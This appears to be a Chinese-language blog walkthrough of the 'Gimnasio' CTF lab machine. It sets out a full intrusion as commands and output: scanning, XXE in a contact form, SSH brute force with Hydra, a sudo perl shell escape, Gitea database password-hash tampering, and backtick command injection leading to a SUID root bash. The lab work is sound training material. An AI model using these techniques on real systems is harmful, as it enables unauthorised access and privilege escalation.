Pepster'Blog
TheHackersLabs-Gimnasio-Walkthrough
城南花已开 Lv6
  2025-02-25 12:29:04   2025-04-18 23:34:08    4k 字  23 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.206  08:00:27:ab:97:30       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e5:e5:eb       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.078 seconds (123.20 hosts/sec). 4 responded
export ip=192.168.60.206
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
You miss 100% of the ports you don't scan. - RustScan

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.206:22
Open 192.168.60.206:80
Open 192.168.60.206:3000
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-25 12:29 CST
Initiating ARP Ping Scan at 12:29
Scanning 192.168.60.206 [1 port]
Completed ARP Ping Scan at 12:29, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:29
Completed Parallel DNS resolution of 1 host. at 12:29, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 12:29
Scanning 192.168.60.206 [3 ports]
Discovered open port 80/tcp on 192.168.60.206
Discovered open port 22/tcp on 192.168.60.206
Discovered open port 3000/tcp on 192.168.60.206
Completed SYN Stealth Scan at 12:29, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.206
Host is up, received arp-response (0.0010s latency).
Scanned at 2025-02-25 12:29:27 CST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
80/tcp   open  http    syn-ack ttl 64
3000/tcp open  ppp     syn-ack ttl 63
MAC Address: 08:00:27:AB:97:30 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

编辑hosts,添加域名

1
2
3
sudo vim /etc/hosts
[sudo] password for Pepster:
192.168.60.206  neogym.thl

扫一下目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.206
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,zip,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 17809]
/contact.php          (Status: 200) [Size: 5951]
/images               (Status: 301) [Size: 317] [--> http://192.168.60.206/images/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.60.206/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.60.206/js/]
/why.php              (Status: 200) [Size: 7315]
/process.php          (Status: 200) [Size: 45]
/views                (Status: 301) [Size: 316] [--> http://192.168.60.206/views/]
/trainer.php          (Status: 200) [Size: 6831]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

分别访问下

XXE漏洞

发现在contact.php点击提交会向process.php发POST包

其中process.php存在XXE漏洞,虽然没有回显,但可以看到确实执行成功了

image

1
2
tail -f /var/log/nginx/access.log
192.168.60.206 - - [25/Feb/2025:13:47:18 +0800] "GET /rev.php HTTP/1.1" 200 9288 "-" "-"

后来我看到响应中name会有回显,那我尝试利用php过滤器读一下源代码

image

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php
$xmlData = file_get_contents('php://input');

if ($_SERVER['REQUEST_METHOD'] === 'POST' && $xmlData !== null && $xmlData !== '') {
    libxml_use_internal_errors(true);

    $dom = new DOMDocument();
    
    $dom->resolveExternals = true;
    $dom->substituteEntities = false;
    
    $loaded = @$dom->loadXML($xmlData, LIBXML_DTDLOAD | LIBXML_NOENT | LIBXML_DTDATTR);
    
    if ($loaded === false) {
        $errors = libxml_get_errors();
        foreach ($errors as $error) {
            file_put_contents('php://stderr', "Error XML: {$error->message}\n");
        }
    
	echo "Hubo un error al procesar la solicitud.";
    } else {
        $xml = simplexml_import_dom($dom);

        $name = (string)$xml->name;
        $email = (string)$xml->email;
        $phone = (string)$xml->phone;
        $message = (string)$xml->message;

        echo "¡Gracias por ponerte en contacto con nosotros, {$name}! En breve nos estaremos comunicando contigo. ¡Saludos desde NeoGym!";
    }
} else {
    echo "Ocurrió un error al procesar la solicitud.";
}
?>


源代码就是处理HTTP POST请求接受XML数据,没啥有用的信息

我试着读取了/etc/passwd

1
2
3
4
5
root:x:0:0:root:/root:/bin/bash
kyle:x:1000:1000:kyle,,,:/home/kyle:/bin/bash
postgres:x:113:123:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
james:x:1001:1001:James,,,:/home/james:/bin/bash
steve:x:1002:1002:Steve,,,:/home/steve:/bin/bash

尝试爆破得到一个登录凭证james:manchesterunited

1
2
3
4
5
6
7
8
9
10
11
12
13
14
❯ hydra -L name -P /usr/share/wordlists/rockyou.txt ssh://$ip -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-25 17:14:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 43033197 login tries (l:3/p:14344399), ~2689575 tries per task
[DATA] attacking ssh://192.168.60.206:22/
[STATUS] 219.00 tries/min, 219 tries in 00:01h, 43032979 to do in 3274:58h, 15 active
[STATUS] 213.67 tries/min, 641 tries in 00:03h, 43032557 to do in 3356:41h, 15 active
[STATUS] 239.14 tries/min, 1674 tries in 00:07h, 43031524 to do in 2999:01h, 15 active
[22][ssh] host: 192.168.60.206   login: james   password: manchesterunited
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

用户提权

ssh连接一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
❯ ssh james@$ip
The authenticity of host '192.168.60.206 (192.168.60.206)' can't be established.
ED25519 key fingerprint is SHA256:zKXP6w9NN/kxInvTLyVBsXbPdh2JBQZuQm4JoesE2+4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.206' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux neogym 6.1.0-30-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.124-1 (2025-01-12) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Feb 24 14:45:19 2025 from 192.168.18.16
james@neogym:~$ ls -al
total 40
drwx------ 5 james james 4096 Feb 24 12:51 .
drwxr-xr-x 5 root  root  4096 Feb 23 10:51 ..
lrwxrwxrwx 1 root  root     9 Feb 23 11:01 .bash_history -> /dev/null
-rw-r--r-- 1 james james  220 Jan 31 21:13 .bash_logout
-rw-r--r-- 1 james james 3526 Jan 31 21:13 .bashrc
drwx------ 4 james james 4096 Jan 31 22:24 .cache
drwxr-xr-x 3 james james 4096 Jan 31 22:24 .config
-rw-r--r-- 1 james james 5290 Jan 31 21:13 .face
lrwxrwxrwx 1 james james    5 Jan 31 21:13 .face.icon -> .face
drwx------ 4 james james 4096 Jan 31 22:25 .local
-rw-r--r-- 1 james james  807 Jan 31 21:13 .profile
james@neogym:~$ id
uid=1001(james) gid=1001(james) groups=1001(james),100(users)
james@neogym:~$ sudo -l
Matching Defaults entries for james on neogym:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User james may run the following commands on neogym:
    (kyle) NOPASSWD: /usr/bin/perl

可以利用sudo权限进行perl提权至kyle用户

然而kyle还有sudo权限,先读个user

1
2
3
4
5
6
7
8
9
10
11
12
james@neogym:~$ sudo -u kyle /usr/bin/perl -e 'exec "/bin/bash";'
kyle@neogym:/home/james$ id
uid=1000(kyle) gid=1000(kyle) groups=1000(kyle),100(users)
kyle@neogym:~$ cat user.txt
9551bfd5501e3cb80b264056b0f66986
kyle@neogym:/home/james$ sudo -l
Matching Defaults entries for kyle on neogym:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User kyle may run the following commands on neogym:
    (ALL) NOPASSWD: /usr/bin/python3 /opt/scripts/systemcheck.py *

不过这个脚本没法读

我尝试执行一下

发现大多是docker的封装命令

同时执行完后会收到邮件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
kyle@neogym:/opt$ sudo /usr/bin/python3 /opt/scripts/systemcheck.py -a


Ayuda:

container-inspect: Inspecciona un cierto contenedor de Docker
container-images:  Lista las imagenes
container-ps:      Lista los contenedores que estan en ejecución
full-check:        Realiza un chequeo del sistema

Ejemplo de uso:

/usr/bin/python3 /opt/scripts/system-checkup.py container-ps
/usr/bin/python3 /opt/scripts/system-checkup.py container-images
/usr/bin/python3 /opt/scripts/system-checkup.py container-inspect <container_name>
/usr/bin/python3 /opt/scripts/system-checkup.py full-check

kyle@neogym:/opt$ sudo /usr/bin/python3 /opt/scripts/systemcheck.py container-ps
CONTAINER ID   IMAGE                COMMAND                  CREATED      STATUS             PORTS                                               NAMES
23f46d29b6e5   gitea/gitea:latest   "/usr/bin/entrypoint…"   2 days ago   Up About an hour   22/tcp, 0.0.0.0:3000->3000/tcp, :::3000->3000/tcp   gitea
349800ace4ef   mysql:8              "docker-entrypoint.s…"   2 days ago   Up About an hour   3306/tcp, 33060/tcp                                 gitea-db
You have mail in /var/mail/kyle
kyle@neogym:/opt$ cat /var/mail/kyle
From [email protected] Tue Feb 25 06:33:15 2025
Return-path: <[email protected]>
Envelope-to: [email protected]
Delivery-date: Tue, 25 Feb 2025 06:33:15 -0300
Received: from kyle by neogym.thl.neogym.thl with local (Exim 4.96)
        (envelope-from <[email protected]>)
        id 1tmrJT-0000pk-2m
        for [email protected];
        Tue, 25 Feb 2025 06:33:15 -0300
To: [email protected]
Auto-Submitted: auto-generated
Subject: *** SECURITY information for neogym.thl.neogym.thl ***
From: kyle <[email protected]>
Message-Id: <[email protected]>
Date: Tue, 25 Feb 2025 06:33:15 -0300

neogym.thl.neogym.thl : Feb 25 06:33:15 : kyle : a password is required ; TTY=pts/1 ; PWD=/opt ; USER=root ; COMMAND=/usr/bin/python3 /opt/scripts/systemcheck.py


kyle@neogym:/opt$

此外我还发现在steve家目录中有个凭证

不过我尝试切换用户发现密码不对,尝试利用此登录gitea 无果

1
2
3
4
5
6
7
8
9
kyle@neogym:/home/steve$ cat .bash_history
ls -l
ls -la
exit
ls -l
vim credenciales.txt
exit
kyle@neogym:/home/steve$ cat credenciales.txt
steve:Sup3rP4$sw0rd123!

后来再次信息收集的发现还存在一个子域名admin.neogym.thl

可以读数据库配置文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
kyle@neogym://var/www/html/admin$ ls -la
total 100
drwxr-xr-x 7 root root  4096 Feb 24 10:04 .
drwxr-xr-x 4 root root  4096 Jan 31 20:50 ..
-rw-r--r-- 1 root root    43 Jan 24 23:01 config.php
drwxr-xr-x 2 root root  4096 Jan 24 21:47 css
-rw-r--r-- 1 root root   310 Jan 31 20:48 db.php
drwxr-xr-x 2 root root  4096 Jan 31 20:47 img
-rw-r--r-- 1 root root 29690 Jan 25 15:59 index.php
drwxr-xr-x 3 root root  4096 Jan 24 21:38 js
-rw-r--r-- 1 root root  1091 Dec 14 22:51 LICENSE
-rw-r--r-- 1 root root  3617 Jan 25 12:36 login.php
-rw-r--r-- 1 root root    85 Dec 15 11:37 logout.php
-rw-r--r-- 1 root root  4141 Dec 14 22:51 README.md
-rw-r--r-- 1 root root  2766 Feb 24 09:51 save_client.php
drwxr-xr-x 2 root root  4096 Jan 24 21:38 uploads
-rw-r--r-- 1 root root  2342 Dec 15 11:43 utils.php
-rw-r--r-- 1 root root  1227 Jan 25 15:19 validate.php
drwxr-xr-x 8 root root  4096 Jan 24 21:38 vendor
kyle@neogym://var/www/html/admin$ cat db.php
<?php
$db_host = '127.0.0.1';
$db_port = 5432;
$db_user = 'postgres';
$db_password = 'uDq&9h&Qpc81urFS1F';
$db_name = 'neogym';

$conn = pg_connect("host=$db_host port=$db_port dbname=$db_name user=$db_user password=$db_password");

if (!$conn) {
  echo "Error de conexión a la base de datos.";
}

编辑一下hosts,添加新域名

利用上面的凭证登录一下

image

不过这也没啥用啊,可以添加合作伙伴,但是出错

到这我感觉完全是方向走错了

越来越向前了

Root提权

换个方向,本地不是存在docker吗

还有脚本可以显示容器的详细信息

看到有config信息,得到mysql的登录凭证

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
kyle@neogym:~$ sudo /usr/bin/python3 /opt/scripts/systemcheck.py container-inspect 23f46d29b6e5
[
    {
        "Id": "23f46d29b6e5de202e53171d7aadae36cbb890a75b68e42c7d36117f409be85d",
        "Created": "2025-02-23T00:59:10.661365463Z",
        "Path": "/usr/bin/entrypoint",
        "Args": [
            "/usr/bin/s6-svscan",
            "/etc/s6"

        "Config": {
            "Hostname": "23f46d29b6e5",
            "Domainname": "",
            "User": "",
            "AttachStdin": false,
            "AttachStdout": false,
            "AttachStderr": false,
            "ExposedPorts": {
                "22/tcp": {},
                "3000/tcp": {}
            },
            "Tty": false,
            "OpenStdin": false,
            "StdinOnce": false,
            "Env": [
                "DB_NAME=gitea",
                "DB_USER=gitea",
                "DB_PASSWD=rIS2i8FdX89jHqkyWy4",
                "USER_UID=1000",
                "USER_GID=1000",
                "DB_TYPE=mysql",
                "DB_HOST=gitea-db:3306",
                "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                "USER=git",
                "GITEA_CUSTOM=/data/gitea"
    }
]

利用fscan扫一下docker中的服务

得到mysql服务开放在172.18.0.3:3306

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
kyle@neogym:/tmp$ ./fscan -h 172.18.0.0/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] CIDR范围: 172.18.0.0-172.18.0.255
[*] 已生成IP范围: 172.18.0.0 - 172.18.0.255
[*] 已解析CIDR 172.18.0.0/24 -> IP范围 172.18.0.0-172.18.0.255
[*] 最终有效主机数量: 256
[-] 正在尝试无监听ICMP探测...
[-] 当前用户权限不足,无法发送ICMP包
[*] 切换为PING方式探测...
[+] 目标 172.18.0.1      存活 (ICMP)
[+] 目标 172.18.0.2      存活 (ICMP)
[+] 目标 172.18.0.3      存活 (ICMP)
[+] ICMP存活主机数量: 3
[*] 共解析 218 个有效端口
[+] 端口开放 172.18.0.1:80
[+] 端口开放 172.18.0.2:22
[+] 端口开放 172.18.0.1:22
[+] 端口开放 172.18.0.3:3306
[+] 端口开放 172.18.0.2:3000
[+] 端口开放 172.18.0.1:3000
[+] 存活端口数量: 6
[*] 开始漏洞扫描...
[*] 网站标题 http://172.18.0.1         状态码:200 长度:17809  标题:Neogym
[*] 网站标题 http://172.18.0.1:3000    状态码:200 长度:13589  标题:Gitea: Git with a cup of tea
[*] 网站标题 http://172.18.0.2:3000    状态码:200 长度:13589  标题:Gitea: Git with a cup of tea
[+] 发现指纹 目标: http://172.18.0.1:3000    指纹: [Gitea简易Git服务]
[+] 发现指纹 目标: http://172.18.0.2:3000    指纹: [Gitea简易Git服务]
[!] 扫描错误 172.18.0.3:3306 - Error 1524 (HY000): Plugin 'mysql_native_password' is not loaded
[!] 扫描错误 172.18.0.2:22 - ssh: handshake failed: EOF
[!] 扫描错误 172.18.0.1:22 - 扫描总时间超时: context deadline exceeded
[+] 扫描已完成: 6/6
[*] 扫描结束,耗时: 13.066505449s

连接一下docker中mysql

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
kyle@neogym:/tmp$ mysql -h 172.18.0.3 -ugitea -prIS2i8FdX89jHqkyWy4
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 250881
Server version: 8.4.4 MySQL Community Server - GPL

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| gitea              |
| information_schema |
| performance_schema |
+--------------------+
3 rows in set (0.047 sec)

MySQL [(none)]> use gitea
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

sDatabase changed
MySQL [gitea]> show tables;
+---------------------------+
| Tables_in_gitea           |
+---------------------------+
| access                    |
| access_token              |
| action                    |
| action_artifact           |
| action_run                |
| action_run_index          |
| action_run_job            |
| action_runner             |
| action_runner_token       |
| action_schedule           |
| action_schedule_spec      |
| action_task               |
| action_task_output        |
| action_task_step          |
| action_tasks_version      |
| action_variable           |
| app_state                 |
| attachment                |
| auth_token                |
| badge                     |
| branch                    |
| collaboration             |
| comment                   |
| commit_status             |
| commit_status_index       |
| commit_status_summary     |
| dbfs_data                 |
| dbfs_meta                 |
| deploy_key                |
| email_address             |
| email_hash                |
| external_login_user       |
| follow                    |
| gpg_key                   |
| gpg_key_import            |
| hook_task                 |
| issue                     |
| issue_assignees           |
| issue_content_history     |
| issue_dependency          |
| issue_index               |
| issue_label               |
| issue_user                |
| issue_watch               |
| label                     |
| language_stat             |
| lfs_lock                  |
| lfs_meta_object           |
| login_source              |
| milestone                 |
| mirror                    |
| notice                    |
| notification              |
| oauth2_application        |
| oauth2_authorization_code |
| oauth2_grant              |
| org_user                  |
| package                   |
| package_blob              |
| package_blob_upload       |
| package_cleanup_rule      |
| package_file              |
| package_property          |
| package_version           |
| project                   |
| project_board             |
| project_issue             |
| protected_branch          |
| protected_tag             |
| public_key                |
| pull_auto_merge           |
| pull_request              |
| push_mirror               |
| reaction                  |
| release                   |
| renamed_branch            |
| repo_archiver             |
| repo_indexer_status       |
| repo_license              |
| repo_redirect             |
| repo_topic                |
| repo_transfer             |
| repo_unit                 |
| repository                |
| review                    |
| review_state              |
| secret                    |
| session                   |
| star                      |
| stopwatch                 |
| system_setting            |
| task                      |
| team                      |
| team_invite               |
| team_repo                 |
| team_unit                 |
| team_user                 |
| topic                     |
| tracked_time              |
| two_factor                |
| upload                    |
| user                      |
| user_badge                |
| user_blocking             |
| user_open_id              |
| user_redirect             |
| user_setting              |
| version                   |
| watch                     |
| webauthn_credential       |
| webhook                   |
+---------------------------+
111 rows in set (0.003 sec)

MySQL [gitea]> select * from user;
+----+---------------+---------------+-----------+---------------------------+--------------------+--------------------------------+------------------------------------------------------------------------------------------------------+------------------+----------------------+------------+--------------+------------+------+----------+---------+----------------------------------+----------------------------------+----------+-------------+--------------+--------------+-----------------+----------------------+-------------------+-----------+----------+---------------+----------------+--------------------+---------------------------+----------------+----------------------------------+---------------------------+-------------------+---------------+---------------+-----------+-----------+-----------+-------------+------------+-------------------------------+-----------------+------------+-----------------------+
| id | lower_name    | name          | full_name | email                     | keep_email_private | email_notifications_preference | passwd                                                                                               | passwd_hash_algo | must_change_password | login_type | login_source | login_name | type | location | website | rands                            | salt                             | language | description | created_unix | updated_unix | last_login_unix | last_repo_visibility | max_repo_creation | is_active | is_admin | is_restricted | allow_git_hook | allow_import_local | allow_create_organization | prohibit_login | avatar                           | avatar_email              | use_custom_avatar | num_followers | num_following | num_stars | num_repos | num_teams | num_members | visibility | repo_admin_change_team_access | diff_view_style | theme      | keep_activity_private |
+----+---------------+---------------+-----------+---------------------------+--------------------+--------------------------------+------------------------------------------------------------------------------------------------------+------------------+----------------------+------------+--------------+------------+------+----------+---------+----------------------------------+----------------------------------+----------+-------------+--------------+--------------+-----------------+----------------------+-------------------+-----------+----------+---------------+----------------+--------------------+---------------------------+----------------+----------------------------------+---------------------------+-------------------+---------------+---------------+-----------+-----------+-----------+-------------+------------+-------------------------------+-----------------+------------+-----------------------+
|  1 | administrador | administrador |           | [email protected] |                  0 | enabled                        | 93725bcf4547d4a48bbf1db5388d84384d0c2d5d2d300abcf88f27bda8ca43343bdbdb907e821c7773b3850fe13e2603da3c | pbkdf2$50000$50  |                    0 |          0 |            0 |            |    0 |          |         | fab0c0813109116d4d6dd1f8e9b3a5d6 | f439c46d381ae6790b9e6ce0a44101d5 | en-US    |             |   1740272753 |   1740410915 |      1740410915 |                    1 |                -1 |         1 |        1 |             0 |              0 |                  0 |                         1 |              0 | fed541306f75ad60abcc37c7a1bf427d | [email protected] |                 0 |             0 |             0 |         0 |         1 |         0 |           0 |          2 |                             0 |                 | gitea-auto |                     0 |
+----+---------------+---------------+-----------+---------------------------+--------------------+--------------------------------+------------------------------------------------------------------------------------------------------+------------------+----------------------+------------+--------------+------------+------+----------+---------+----------------------------------+----------------------------------+----------+-------------+--------------+--------------+-----------------+----------------------+-------------------+-----------+----------+---------------+----------------+--------------------+---------------------------+----------------+----------------------------------+---------------------------+-------------------+---------------+---------------+-----------+-----------+-----------+-------------+------------+-------------------------------+-----------------+------------+-----------------------+
1 row in set (0.002 sec)

MySQL [gitea]>

从中得到 administrador的密码hash

丢到在线平台爆破一下,出不来

既然没法爆破,那咱们直接把hash改成自己想要的不就可以了

修改其中passwd passwd_hash_algo字段

网上生成一个hash

Bcrypt Encrypt - Bcrypt Hash Generator - Online - Browserling Web Developer Tools

image

1
2
3
4
5
6
7
MySQL [gitea]> update user set passwd="$2a$10$cSeNaAidmhzMwlVoW56wyeIeD78VDDx0Nq/zcE91a.mC86w4q0DxC" where id=1;
Query OK, 1 row affected (0.018 sec)
Rows matched: 1  Changed: 1  Warnings: 0
MySQL [gitea]> update user set passwd_hash_algo="bcrypt" where id=1;
Query OK, 1 row affected (0.008 sec)
Rows matched: 1  Changed: 1  Warnings: 0

登录进去有个仓库,发现这个script不就是sudo执行的那个吗

这下可以看到源码了

image

发现源码中的container_inspect中第二个参数可以进行命令执行

image

就类似于拼接成docker inspect $(id),bash会率先执行$( )中的命令

不过在此shell环境中命令没有回显

给bash加个suid权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
kyle@neogym:~$ sudo /usr/bin/python3 /opt/scripts/systemcheck.py container-inspect '`id`'
[]
Error: No such object: uid=0(root)
Error: No such object: gid=0(root)
Error: No such object: groups=0(root)
kyle@neogym:~$ sudo /usr/bin/python3 /opt/scripts/systemcheck.py container-inspect '`bash`'
root@neogym:/home/kyle# cat /root/root.txt
root@neogym:/home/kyle# ls -al /root/
root@neogym:/home/kyle# chmod +s /bin/bash
root@neogym:/home/kyle# exit
exit
unknown shorthand flag: '>' in ->
See 'docker inspect --help'.
kyle@neogym:~$ bash -p
bash-5.2# cat /root/root.txt
89db0121a107d46b719f52eac2f03567

  1. 信息收集
    1. 服务探测
    2. XXE漏洞
  2. 用户提权
  3. Root提权
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 502.5k
  1. 信息收集
    1. 服务探测
    2. XXE漏洞
  2. 用户提权
  3. Root提权